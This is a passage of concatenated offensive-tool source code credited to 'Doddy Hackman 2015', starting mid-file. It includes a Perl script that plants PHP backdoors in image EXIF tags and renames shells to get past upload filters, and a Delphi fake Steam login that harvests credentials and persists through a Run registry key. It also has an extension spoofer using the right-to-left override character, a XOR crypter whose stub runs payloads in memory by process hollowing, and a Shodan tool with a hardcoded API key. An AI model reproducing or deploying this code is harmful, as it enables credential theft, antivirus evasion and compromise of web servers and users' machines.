print "bypass.php;test.jpg\n";
printear("[+] 3 : ");
print "bypass.php%00.jpg\n";
printear_titulo("\n[+] Option : ");
chomp( my $opcion = <stdin> );
if ( $opcion eq "1" ) {
savefile( $file . ".jpg.php", $source );
chmod 0777, $file . ".jpg.php";
}
elsif ( $opcion eq "2" ) {
savefile( $file . ".php;test.jpg", $source );
chmod 0777, $file . ".php;test.jpg";
}
elsif ( $opcion eq "3" ) {
savefile( $file . ".php%00.jpg", $source );
chmod 0777, $file . ".php%00.jpg";
}
else {
savefile( $file . ".jpg.php", $source );
chmod 0777, $file . ".jpg.php";
}
printear("\n[+] PHP Shell Bypassed\n");
}
else {
printear("\n[-] File not found\n");
}
}
else {
sintax();
}
copyright();
# Functions
sub backdoor_tag {
my $image = $_[0];
my $opcion = $_[1];
my $final = $_[2];
my $tag = "Model";
my $nombre = $shells[$opcion]->{nombre};
my $valor = $shells[$opcion]->{codigo};
my $ejemplo = $shells[$opcion]->{ejemplo};
printear("\n[+] Backdoor Name : ");
print "$nombre\n";
printear("[+] Backdoor Example : ");
print "$ejemplo\n";
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($image);
$datos_imagen->SetNewValue( $tag, $valor );
unlink($final);
$ok = $datos_imagen->WriteInfo( $image, $final );
if ( $ok eq "1" ) {
printear_titulo("\n[+] Backdoor : ");
print "OK\n";
chmod 0777, $final;
}
else {
printear_titulo("\n[-] Backdoor: ");
print "Error\n";
}
}
sub delete_tag {
my $imagen_target = $_[0];
my $tag = $_[1];
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
$datos_imagen->SetNewValue( $tag, undef );
$ok = $datos_imagen->WriteInfo($imagen_target);
if ( $ok eq "1" ) {
printear_titulo("[+] Tag $tag : ");
print "Deleted\n";
}
else {
printear_titulo("[-] Tag $tag : ");
print "Error\n";
}
}
sub update_tag {
my $image = $_[0];
my $tag = $_[1];
my $valor = $_[2];
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($image);
$datos_imagen->SetNewValue( $tag, $valor );
$ok = $datos_imagen->WriteInfo($image);
if ( $ok eq "1" ) {
printear_titulo("[+] Tag $tag : ");
print "Updated\n";
}
else {
printear_titulo("[-] Tag $tag : ");
print "Error\n";
}
}
sub make_tag {
my $image = $_[0];
my $name = $_[1];
my $value = $_[2];
my $poc = Image::ExifTool->new();
$poc->ExtractInfo($image);
$poc->SetNewValue( $name, $value );
$ok = $poc->WriteInfo($image);
if ( $ok eq "1" ) {
printear_titulo("[+] Tag $name : ");
print "Created\n";
}
else {
printear_titulo("[-] Tag $name : ");
print "Error\n";
}
}
sub read_tag {
$imagen_target = $_[0];
$tag = $_[1];
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
$valor = $datos_imagen->GetValue($tag);
if ( $valor eq "" ) {
printear("[-] Tag not found\n");
}
else {
printear("[+] $tag : ");
print $valor. "\n";
}
}
sub dump_tags {
my $imagen_target = $_[0];
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
@tags = $datos_imagen->GetFoundTags("File");
for my $tag (@tags) {
printear("[+] Tag : ");
print $tag. "\n";
}
}
sub dump_all {
my $imagen_target = $_[0];
my $datos_imagen = new Image::ExifTool;
my $informacion_imagen = $datos_imagen->ImageInfo($imagen_target);
for my $abriendo_imagen ( $datos_imagen->GetFoundTags("Group0") ) {
my $valor = $informacion_imagen->{$abriendo_imagen};
printear("[+] $abriendo_imagen : ");
print $valor. "\n";
}
}
sub savefile {
open( SAVE, ">>" . $_[0] );
print SAVE $_[1] . "\n";
close SAVE;
}
sub readfile {
open my $FILE, q[<], $_[0];
my $word = join q[], <$FILE>;
close $FILE;
return $word;
}
sub printear {
cprint( "\x036" . $_[0] . "\x030" );
}
sub printear_logo {
cprint( "\x037" . $_[0] . "\x030" );
}
sub printear_titulo {
cprint( "\x0310" . $_[0] . "\x030" );
}
sub sintax {
printear("[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-dump_all <image> : Get all information of a image\n";
print "-dump_tags <image> : Get all tags of a image\n";
print "-read_tag <image> -tag <tag> : Read value tags of a image\n";
print "-make_tag <image> -tag <tag> -value <value> : Make a new tag\n";
print "-update_tag <image> -tag <tag> -value <value> : Update tag\n";
print "-delete_tag <image> -tag <tag> : Delete tag\n";
print "-backdoor <image> -file <name> : Insert backdoor in a image\n";
print
"-bypass <php shell> -file <name> : Rename extension of a image to bypass\n";
printear("\n[+] Example : ");
print "perl lfi_image_helper.pl -dump_all test.jpg\n";
copyright();
}
sub head {
printear_logo("\n-- == LFI Image Helper 0.8 == --\n\n\n");
}
sub copyright {
printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
exit(1);
}
sub toma {
return $nave->get( $_[0] )->content;
}
#The End ?
// Fake Steam 0.3
// (C) Doddy Hackman 2015
unit fake;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ExtCtrls, Vcl.Imaging.pngimage,
Vcl.StdCtrls, Registry;
type
TForm1 = class(TForm)
Image1: TImage;
Image2: TImage;
Edit1: TEdit;
Edit2: TEdit;
Image3: TImage;
Image4: TImage;
Image5: TImage;
Image6: TImage;
procedure Image2Click(Sender: TObject);
procedure Image3Click(Sender: TObject);
procedure Image4Click(Sender: TObject);
procedure Image5Click(Sender: TObject);
procedure Image6Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.FormCreate(Sender: TObject);
var
nombrereal: string;
rutareal: string;
yalisto: string;
her: TRegistry;
begin
try
begin
nombrereal := ExtractFileName(ParamStr(0));
rutareal := ParamStr(0);
yalisto := 'C:\WINDOWS\' + nombrereal;
CopyFile(Pchar(rutareal), Pchar(yalisto), false);
her := TRegistry.Create;
her.RootKey := HKEY_LOCAL_MACHINE;
her.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', false);
her.WriteString('ubersteam', yalisto);
her.Free;
SetFileAttributes(Pchar(yalisto), FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(Pchar('C:/windows/datos.txt'), FILE_ATTRIBUTE_HIDDEN);
end;
except
//
end;
end;
procedure TForm1.Image2Click(Sender: TObject);
var
archivo: TextFile;
ruta: string;
begin
if (Edit1.Text = 'doddy') and (Edit2.Text = 'hackman') then
begin
try
begin
WinExec('notepad c:/windows/datos.txt', SW_SHOW);
end;
except
//
end;
end
else
begin
if Edit1.Text = '' then
begin
ShowMessage('Escriba tu usuario');
end;
if Edit2.Text = '' then
begin
ShowMessage('Escribe tu contraseña');
end
else
begin
if Edit2.Text = 'Escribe aqui tu contraseña' then
begin
ShowMessage('Escribe tu contraseña');
end
else
begin
try
begin
ruta := 'c:/windows/datos.txt'; // mod
if FileExists(ruta) then
begin
AssignFile(archivo, ruta);
FileMode := fmOpenWrite;
Append(archivo);
Writeln(archivo, '[user] : ' + Edit1.Text + ' [password] : ' +
Edit2.Text);
CloseFile(archivo);
Application.MessageBox
('Se ha producido un error , es necesario reiniciar Steam',
'Steam', MB_OK);
Form1.Close;
end
else
begin
AssignFile(archivo, ruta);
FileMode := fmOpenWrite;
ReWrite(archivo);
Writeln(archivo, '[user] : ' + Edit1.Text + ' [password] : ' +
Edit2.Text);
CloseFile(archivo);
Application.MessageBox
('Se ha producido un error , es necesario reiniciar Steam',
'Steam', MB_OK);
Form1.Close;
end;
end;
except
//
end;
end;
end;
end;
end;
procedure TForm1.Image3Click(Sender: TObject);
begin
Application.Terminate;
end;
procedure TForm1.Image4Click(Sender: TObject);
begin
ShowMessage('Not available');
end;
procedure TForm1.Image5Click(Sender: TObject);
begin
ShowMessage('Not available');
end;
procedure TForm1.Image6Click(Sender: TObject);
begin
ShowMessage('Not available');
end;
end.
// The End ?
// DH Server Manager 0.3
// (C) Doddy Hackman 2015
// Based on : http://www.nerdprogrammer.in/2014/05/the-rats-crew-aio.html
unit dhserverman;
interface
uses
Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants,
System.Classes, Vcl.Graphics,
Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls, Vcl.ComCtrls,
Vcl.ExtCtrls, Vcl.Imaging.pngimage, madRes, StrUtils;
type
TForm1 = class(TForm)
PageControl1: TPageControl;
TabSheet1: TTabSheet;
TabSheet2: TTabSheet;
TabSheet3: TTabSheet;
GroupBox1: TGroupBox;
ruta_archivo: TEdit;
Button1: TButton;
GroupBox2: TGroupBox;
Button2: TButton;
StatusBar1: TStatusBar;
TabSheet5: TTabSheet;
GroupBox3: TGroupBox;
GroupBox4: TGroupBox;
count: TEdit;
UpDown1: TUpDown;
tipo_cantidad: TComboBox;
GroupBox5: TGroupBox;
ruta_icono: TEdit;
Button3: TButton;
GroupBox6: TGroupBox;
Image1: TImage;
OpenDialog1: TOpenDialog;
OpenDialog2: TOpenDialog;
GroupBox7: TGroupBox;
usefilepumper: TCheckBox;
iconchanger: TCheckBox;
extensiones: TComboBox;
selectextension: TCheckBox;
GroupBox8: TGroupBox;
mi_extension: TCheckBox;
esta_extension: TEdit;
extensionchanger: TCheckBox;
TabSheet4: TTabSheet;
Image2: TImage;
GroupBox9: TGroupBox;
Image3: TImage;
Memo1: TMemo;
procedure Button2Click(Sender: TObject);
procedure Button3Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure Button1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// Functions
procedure file_pumper(archivo: string; cantidad: LongWord);
var
arraycantidad: array of Byte;
abriendo: TFileStream;
begin
abriendo := TFileStream.Create(archivo, fmOpenReadWrite);
SetLength(arraycantidad, cantidad);
ZeroMemory(@arraycantidad[1], cantidad);
abriendo.Seek(0, soFromEnd);
abriendo.Write(arraycantidad[0], High(arraycantidad));
abriendo.Free;
end;
procedure extension_changer(archivo: string; extension: string);
var
nombre: string;
begin
nombre := ExtractFileName(archivo);
nombre := StringReplace(nombre, ExtractFileExt(nombre), '',
[rfReplaceAll, rfIgnoreCase]);
nombre := nombre + char(8238) + ReverseString('.' + extension) + '.exe';
MoveFile(PChar(archivo), PChar(ExtractFilePath(archivo) + nombre));
end;
//
procedure TForm1.Button1Click(Sender: TObject);
begin
if OpenDialog1.Execute then
begin
ruta_archivo.Text := OpenDialog1.FileName;
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
var
change: dword;
valor: string;
tipocantidad: string;
tipoextension: string;
extensionacambiar: string;
begin
if not(FileExists(ruta_archivo.Text)) then
begin
ShowMessage('Select File to change');
end
else
begin
StatusBar1.Panels[0].Text := '[+] Working ...';
Form1.StatusBar1.Update;
if (usefilepumper.Checked) then
begin
tipocantidad := tipo_cantidad.Items[tipo_cantidad.ItemIndex];
if (tipocantidad = 'Byte') then
begin
file_pumper(ruta_archivo.Text, StrToInt(count.Text) * 8);
end;
if (tipocantidad = 'KiloByte') then
begin
file_pumper(ruta_archivo.Text, StrToInt(count.Text) * 1024);
end;
if (tipocantidad = 'MegaByte') then
begin
file_pumper(ruta_archivo.Text, StrToInt(count.Text) * 1048576);
end;
if (tipocantidad = 'GigaByte') then
begin
file_pumper(ruta_archivo.Text, StrToInt(count.Text) * 1073741824);
end;
if (tipocantidad = 'TeraByte') then
begin
file_pumper(ruta_archivo.Text, StrToInt(count.Text) * 1099511627776);
end;
end;
if (iconchanger.Checked) then
begin
try
begin
change := BeginUpdateResourceW
(PWideChar(wideString(ruta_archivo.Text)), false);
LoadIconGroupResourceW(change, PWideChar(wideString(valor)), 0,
PWideChar(wideString(ruta_icono.Text)));
EndUpdateResourceW(change, false);
end;
except
begin
//
end;
end;
end;
if (extensionchanger.Checked) then
begin
if not(selectextension.Checked and mi_extension.Checked) then
begin
if (selectextension.Checked) then
begin
extensionacambiar := extensiones.Items[extensiones.ItemIndex];
extension_changer(ruta_archivo.Text, extensionacambiar);
end;
if (mi_extension.Checked) then
begin
extension_changer(ruta_archivo.Text, esta_extension.Text);
end;
end;
end;
StatusBar1.Panels[0].Text := '[+] Done';
Form1.StatusBar1.Update;
end;
end;
procedure TForm1.Button3Click(Sender: TObject);
begin
if OpenDialog2.Execute then
begin
ruta_icono.Text := OpenDialog2.FileName;
Image1.Picture.LoadFromFile(OpenDialog2.FileName);
end;
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
OpenDialog1.InitialDir := GetCurrentDir;
OpenDialog2.InitialDir := GetCurrentDir;
OpenDialog2.Filter := 'Icons|*.ico|';
end;
end.
// The End ?
procedure TForm1.Button1Click(Sender: TObject);
begin
if OpenDialog1.Execute then // Abrimos el OpenDialog para insertar la ruta
// del archivo a encriptar
begin
Edit1.Text := OpenDialog1.FileName; // Establecemos el texto de Edit1 con
// la ruta del archivo marcado en el openDialog1
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
var
codigo: string; // Declaramos la variable "codigo" como string
key: integer; // Declaramos la variable "key" como integer
separador: string; // Declaramos la variable "separador" como string
linea: string; // Declaramos la variable "linea" como string
begin
separador := '-barra-';
// Establecemos el valor que tendra la variable "separador"
key := 123; // Establecemos el valor de la variable "key" como 123
codigo := xor_now(leer_archivo(Edit1.Text), key);
// Leemos el archivo que hay en
// la caja de texto y encriptamos con XOR el contenido usando una key
CopyFile(Pchar(ExtractFilePath(Application.ExeName) + '/' + 'stub.exe'),
Pchar(ExtractFilePath(Application.ExeName) + '/' + 'done.exe'), True);
// Copiamos el stub.exe con el nombre de done.exe
linea := separador + codigo + separador + IntToStr(key) + separador;
// Establecemos
// la variable "linea" con el valor de contenido del archivo encriptado con
// XOR y la key del cifrado XOR
escribir_datos('done.exe', '-acatoy1-', '-acatoy2-', linea); // Escribimos
// los datos en el ejecutable done.exe marcando los delimtiadores "acatoy" y
// tambien ponemos el valor de la variable "linea"
ShowMessage('Done');
end;
// Unit : Tools for Crypter
// Coded By Doddy Hackman in the year 2015
// Credits : Based on OP Crypter By Xash
// Thanks to Xash
unit tools;
interface
uses SysUtils, Windows;
function leer_datos(archivo, delimitador1, delimitador2: string): string;
function escribir_datos(ruta, delimitador1, delimitador2, texto: string): bool;
function leer_archivo(archivo_a_leer: String): AnsiString;
function xor_now(texto: string; clave: integer): string;
implementation
function xor_now(texto: string; clave: integer): string;
var
numero: integer; // Establecemos la variable "numero" como integer
contenido: string; // Establecemos la variable "contenido" como string
begin
contenido := ''; // Vaciamos el contenido de la variable "contenido"
for numero := 1 to Length(texto) do // Realizamos un for empezando por 1 hasta
// la longitud de la variable "texto"
begin
contenido := contenido + Char(integer(texto[numero]) xor clave);
// Encriptamos los datos
// con XOR
end;
Result := contenido; // Devolvemos el resultado de la funcion como el valor
// de la variable "contenido"
end;
function leer_archivo(archivo_a_leer: String): AnsiString;
var
archivo: File; // Declaramos la variable "archivo" como File
tipo: Byte; // Declaramos la variable "tipo" como Byte
begin
tipo := FileMode; // Establecemos el FileMode para abrir el archivo
try
FileMode := 0; // Establecemos como "0" el FileMode
AssignFile(archivo, archivo_a_leer); // Abrirmos el archivo
{$I-}
Reset(archivo, 1); // Leemos el archivo desde la primera linea
{$I+}
if IoResult = 0 then // Si IoResult es 0 ...
try
SetLength(Result, FileSize(archivo)); // Establecemos la longitud la
// variable "Result" como la longitud del archivo
if Length(Result) > 0 then
// Si la longitud del resultado es mayor a 0 ...
begin
{$I-}
BlockRead(archivo, Result[1], Length(Result)); // Leemos los datos
{$I+}
if IoResult <> 0 then // Si es distinto a 0 ..
Result := '';
end;
finally
CloseFile(archivo); // Cerramos el archivo
end;
finally
FileMode := tipo; // Declaramos la variable FileMode como la variable "tipo"
end;
end;
function leer_datos(archivo, delimitador1, delimitador2: string): string;
var
contenido: string; // Declaramos la variable "contenido" como string
limite: integer; // Declaramos la variable "limite" como integer
dividiendo: integer; // Declaramos la variable "dividiendo" como integer
dividiendo2: integer; // Declaramos la variable "dividiendo2" como integer
dividiendo3: integer; // Declaramos la variable "dividiendo3" como integer
dividiendo4: integer; // Declaramos la variable "dividiendo4" como integer
control1: integer; // Declaramos la variable "control1" como integer
control2: integer; // Declaramos la variable "control2" como integer
suma: integer; // Declaramos la variable "suma" como integer
numero: integer; // Declaramos la variable "numero" como integer
suma_inicial_1: integer; // Declaramos la variable suma_inicial_1 como integer
suma_inicial_2: integer; // Declaramos la variable suma_inicial_2 como integer
suma_casi_1: integer; // Declaramos la variable suma_casi_1 como integer
suma_casi_2: integer; // Declaramos la variable suma_casi_2 como integer
resultado: string; // Declaramos la variable "resultado" como string
contenido_final: string;
// Declaramos la variable "contenido_final" como string
begin
if (FileExists(archivo)) then // Si existe el archivo ...
begin
contenido := leer_archivo(archivo); // Leemos el archivo y guardamos todo
// en la variable "contenido"
suma_inicial_1 := Length(delimitador1);
// Calculamos la longitud de la variable
// "delimitador1"
suma_inicial_2 := Length(contenido);
// Calculamos la longitud de la variable
// "contenido"
suma := Pos(delimitador1, contenido) + suma_inicial_1;
// Calculamos la posicion del
// "delimitador" en la variable "contenido"
dividiendo := suma_inicial_2 - suma;
// Restamos las variables "suma_inicial_2"
// y "suma"
dividiendo2 := suma_inicial_2 - dividiendo;
// Restamos las variables "suma_inicial_2"
// y "dividiendo"
contenido := Copy(contenido, dividiendo2, suma_inicial_2);
// Copiamos las variables y las guardmamos en "contenido"
suma_casi_1 := Pos(delimitador1, contenido);
// Calculamos la posicion de "delimitador1"
// en la variable "contenido"
suma_casi_2 := suma_casi_1 + suma_inicial_1;
// Sumamos las variables "suma_casi_1"
// y "suma_inicial_1"
control1 := Pos(delimitador2, contenido) - suma_casi_2;
// Calculamos la posicion
// de "delimitador2" en la variable "contenido" y lo restamos con "suma_casi_2"
control2 := control1 - 1; // Restamos en uno la variable "control1"
for numero := 0 to control2 do
// Realizamos un for usando desde 0 hasta el valor
// de la variable "control2"
begin
dividiendo3 := suma_inicial_1 + numero;
// Sumamos la variables varibles "suma_inicial_1"
// y "numero"
dividiendo4 := Pos(delimitador1, contenido) + dividiendo3;
// Calculamos la posicion de "delimitador1" en la variable
// "contenido"
contenido_final := contenido[dividiendo4]; // "Usamos la posicion que esta
// en la variable "dividiendo4" para acceder a cierta posicion de la variable
// "contenido"
resultado := resultado + contenido_final;
// Sumamos las variables "resultado" y
// "contenido_final"
end;
if resultado = '' then // Si la variable "resultado" esta vacia ...
begin
resultado := 'Error'; // Mostramos "Error" en la variable "resultado"
end
else
begin
Result := resultado; // De lo contrario mostramos el contenido de la
// variable "resultado" en resultado de la funcion
end;
end
else
begin
Result := 'Error'; // De lo contrario mostramos "Error" en el resultado de
// la funcion
end;
end;
function escribir_datos(ruta, delimitador1, delimitador2, texto: string): bool;
var
abriendo_archivo: TextFile; // Declaramos la variable "abriendo_archivo" como
// TextFile
begin
if (FileExists(ruta)) then // Si el archivo de la variable "ruta" existe ...
begin
AssignFile(abriendo_archivo, ruta); // Abrimos el archivo de la variable
// "ruta"
Append(abriendo_archivo); // Empezamos a leer el archivo desde la variable
// "abriendo_archivo"
try
begin
WriteLn(abriendo_archivo, delimitador1 + texto + delimitador2);
// Escribimos los datos
// de las variables "delimitador1,"texto","delimitador2"
end
finally
begin
CloseFile(abriendo_archivo); // Cerramos el archivo desde la variable
// "abriendo_archivo"
end;
Result := True; // Devolvemos "True" como resultado de la funcion
end;
end
else
begin
Result := False; // De lo contrario devolvemos "False" como resultado de la
// funcion
end;
end;
end.
// The End ?
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,tools;
{ uExecFromMem
Author: steve10120
Description: Run an executable from another's memory.
Credits: Tan Chew Keong: Dynamic Forking of Win32 EXE; Author of BTMemoryModule: PerformBaseRelocation().
Reference: http://www.security.org.sg/code/loadexe.html
Release Date: 26th August 2009
Website: http://ic0de.org
History: First try
Additions by testest 15th July 2010:
- Parameter support
- Win7 x64 support
}
unit uExecFromMem;
interface
uses Windows;
function ExecuteFromMem(szFilePath, szParams: string; pFile: Pointer):DWORD;
implementation
function NtUnmapViewOfSection(ProcessHandle:DWORD; BaseAddress:Pointer):DWORD; stdcall; external 'ntdll';
type
PImageBaseRelocation = ^TImageBaseRelocation;
TImageBaseRelocation = packed record
VirtualAddress: DWORD;
SizeOfBlock: DWORD;
end;
procedure PerformBaseRelocation(f_module: Pointer; INH:PImageNtHeaders; f_delta: Cardinal); stdcall;
var
l_i: Cardinal;
l_codebase: Pointer;
l_relocation: PImageBaseRelocation;
l_dest: Pointer;
l_relInfo: ^Word;
l_patchAddrHL: ^DWord;
l_type, l_offset: integer;
begin
l_codebase := f_module;
if INH^.OptionalHeader.DataDirectory[5].Size > 0 then
begin
l_relocation := PImageBaseRelocation(Cardinal(l_codebase) + INH^.OptionalHeader.DataDirectory[5].VirtualAddress);
while l_relocation.VirtualAddress > 0 do
begin
l_dest := Pointer((Cardinal(l_codebase) + l_relocation.VirtualAddress));
l_relInfo := Pointer(Cardinal(l_relocation) + 8);
for l_i := 0 to (trunc(((l_relocation.SizeOfBlock - 8) / 2)) - 1) do
begin
l_type := (l_relInfo^ shr 12);
l_offset := l_relInfo^ and $FFF;
if l_type = 3 then
begin
l_patchAddrHL := Pointer(Cardinal(l_dest) + Cardinal(l_offset));
l_patchAddrHL^ := l_patchAddrHL^ + f_delta;
end;
inc(l_relInfo);
end;
l_relocation := Pointer(cardinal(l_relocation) + l_relocation.SizeOfBlock);
end;
end;
end;
function AlignImage(pImage:Pointer):Pointer;
var
IDH: PImageDosHeader;
INH: PImageNtHeaders;
ISH: PImageSectionHeader;
i: WORD;
begin
IDH := pImage;
INH := Pointer(Integer(pImage) + IDH^._lfanew);
GetMem(Result, INH^.OptionalHeader.SizeOfImage);
ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
CopyMemory(Result, pImage, INH^.OptionalHeader.SizeOfHeaders);
for i := 0 to INH^.FileHeader.NumberOfSections - 1 do
begin
ISH := Pointer(Integer(pImage) + IDH^._lfanew + 248 + i * 40);
CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(pImage) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
end;
end;
function Get4ByteAlignedContext(var Base: PContext): PContext;
begin
Base := VirtualAlloc(nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
Result := Base;
if Base <> nil then
while ((DWORD(Result) mod 4) <> 0) do
Result := Pointer(DWORD(Result) + 1);
end;
function ExecuteFromMem(szFilePath, szParams:string; pFile:Pointer):DWORD;
var
PI: TProcessInformation;
SI: TStartupInfo;
CT: PContext;
CTBase: PContext;
IDH: PImageDosHeader;
INH: PImageNtHeaders;
dwImageBase: DWORD;
pModule: Pointer;
dwNull: DWORD;
begin
if szParams <> '' then szParams := '"'+szFilePath+'" '+szParams;
Result := 0;
IDH := pFile;
if IDH^.e_magic = IMAGE_DOS_SIGNATURE then
begin
INH := Pointer(Integer(pFile) + IDH^._lfanew);
if INH^.Signature = IMAGE_NT_SIGNATURE then
begin
FillChar(SI, SizeOf(TStartupInfo), #0);
FillChar(PI, SizeOf(TProcessInformation), #0);
SI.cb := SizeOf(TStartupInfo);
if CreateProcess(PChar(szFilePath), PChar(szParams), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
begin
CT := Get4ByteAlignedContext(CTBase);
if CT <> nil then
begin
CT.ContextFlags := CONTEXT_FULL;
if GetThreadContext(PI.hThread, CT^) then
begin
ReadProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @dwImageBase, 4, dwNull);
if dwImageBase = INH^.OptionalHeader.ImageBase then
begin
if NtUnmapViewOfSection(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase)) = 0 then
pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
else
pModule := VirtualAllocEx(PI.hProcess, nil, INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
end
else
pModule := VirtualAllocEx(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if pModule <> nil then
begin
pFile := AlignImage(pFile);
if DWORD(pModule) <> INH^.OptionalHeader.ImageBase then
begin
PerformBaseRelocation(pFile, INH, (DWORD(pModule) - INH^.OptionalHeader.ImageBase));
INH^.OptionalHeader.ImageBase := DWORD(pModule);
CopyMemory(Pointer(Integer(pFile) + IDH^._lfanew), INH, 248);
end;
WriteProcessMemory(PI.hProcess, pModule, pFile, INH.OptionalHeader.SizeOfImage, dwNull);
WriteProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @pModule, 4, dwNull);
CT.Eax := DWORD(pModule) + INH^.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, CT^);
ResumeThread(PI.hThread);
Result := PI.hThread;
end;
end;
VirtualFree(CTBase, 0, MEM_RELEASE);
end;
if Result = 0 then
TerminateProcess(PI.hProcess, 0);
end;
end;
end;
end;
end.
uses
SysUtils, StrUtils, Windows, uExecFromMem, tools;
type
otro_array = array of string;
// Declaramos el tipo "otro_array" como array of string
procedure regex2(texto: string; separador: string; var resultado: otro_array);
// Thanks to ecfisa for the help
var
numero1: integer; // Declaramos la variable "numero1" como integer
numero2: integer; // Declaramos la variable "numero2" como integer
begin
texto := texto + separador; // Concatenamos la variable "texto" y "separador"
numero2 := Pos(separador, texto); // Calculamos la posicion de "separador" en
// la variable "texto"
numero1 := 1; // Establecemos la variable "numero1" como "1"
while numero1 <= numero2 do
// Mientras "numero1" sea menor o igual a "numero2" ...
begin
SetLength(resultado, Length(resultado) + 1);
// Establecemos la longitud de resultado
// a la longitud de la variable "resultado" mas "1"
resultado[High(resultado)] := Copy(texto, numero1, numero2 - numero1);
// Establecemos la variable "resultado" como la copia de las variables "texto",
// "numero1" y la resta de las variables "numero2" y "numero1"
numero1 := numero2 + Length(separador);
// Establecemos la variable "numero1" como
// la suma de la variable "numero2" y la longitud de ña variable "separador"
numero2 := PosEx(separador, texto, numero1); // Calculamos la posicion de de
// "separador" en el variable "texto"
end;
end;
var
todo: string; // Declaramos la variable "todo" como string
codigo: string; // Declaramos la variable "codigo" como string
key: string; // Declaramos la variable "key" como string
datos: otro_array; // Declaramos la variable "datos" como otro_array
begin
todo := leer_datos(paramstr(0), '-acatoy1-', '-acatoy2-'); // Leemos los datos
// del ejecutable mismo usando los delimitadores "-acatoy1-" y "-acatoy2-"
regex2(todo, '-barra-', datos);
// Separamos los delimitadores que estan separados
// por "-barra-" en la variable "todo"
key := datos[2];
// Establecemos como "key" la segunda posicion del array "datos"
codigo := datos[1];
// Establecemos como "codigo" la primera posicion del array
// "datos"
codigo := xor_now(codigo, StrToInt(key)); // Establecemos como "codigo"
// la encriptacion XOR del contenido de la variable "codigo" usando la key y lo
// guardamos en la variable "codigo"
ExecuteFromMem(paramstr(0), '', Pchar(codigo));
// Ejecutamos el codig en memoria
// usando la funcion "ExecuteFromMem"
end.
#!usr/bin/perl
#Shodan Tool 0.6
#(C) Doddy Hackman 2015
#Based on : https://developer.shodan.io/api
#ppm install http://www.eekboek.nl/dl/ppms/Crypt-SSLeay.ppd
#ppm install http://www.bribes.org/perl/ppm/JSON.ppd
use LWP::UserAgent;
use JSON;
use Getopt::Long;
use Color::Output;
Color::Output::Init;
use IO::Socket;
my $nave = LWP::UserAgent->new( ssl_opts => { verify_hostname => 1 } );
$nave->agent(
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
);
$nave->timeout(5);
my $api_key = "LY10TuYViggY3GXRzLOUxdp6Kk3Lu9sa";
GetOptions(
"ip=s" => \$ip,
"count=s" => \$count,
"search=s" => \$search,
"query" => \$query,
"query_search=s" => \$query_search,
"query_tags" => \$query_tags,
"services" => \$services,
"resolve=s" => \$resolve,
"reverse=s" => \$reverse,
"myip" => \$myip,
"api_info" => \$api_info
);
head();
if ( $ip ne "" ) {
if ( $ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/ ) {
print by_ip($ip);
}
else {
my $get = gethostbyname($ip);
my $ip = inet_ntoa($get);
by_ip($ip);
}
}
elsif ( $count ne "" ) {
by_count($count);
}
elsif ( $search ne "" ) {
by_search($search);
}
elsif ( $query ne "" ) {
by_query();
}
elsif ($query_search) {
by_query_search($query_search);
}
elsif ($query_tags) {
by_query_tags($query_tags);
}
elsif ( $services ne "" ) {
list_services();
}
elsif ( $resolve ne "" ) {
resolve($resolve);
}
elsif ( $reverse ne "" ) {
reverse_now($reverse);
}
elsif ( $myip ne "" ) {
my_ip();
}
elsif ( $api_info ne "" ) {
api_info();
}
else {
sintax();
}
copyright();
# Functions
sub by_query_tags {
printear_titulo("\n[+] Listening the most popular tags ...\n\n");
my $code =
toma( "https://api.shodan.io/shodan/query/tags?key=" . $api_key );
$resultado = JSON->new->decode($code);
my $total = $resultado->{'total'};
if ( $total ne "" ) {
printear("[+] Total : ");
print $total. "\n\n";
}
else {
printear("[-] WTF !");
}
my $i = 0;
my @encontrados = @{ $resultado->{'matches'} };
foreach my $encontrado (@encontrados) {
my $value = $encontrado->{"value"};
my $count = $encontrado->{"count"};
$i++;
print "-------------------------------------\n\n";
if ( $value ne "" ) {
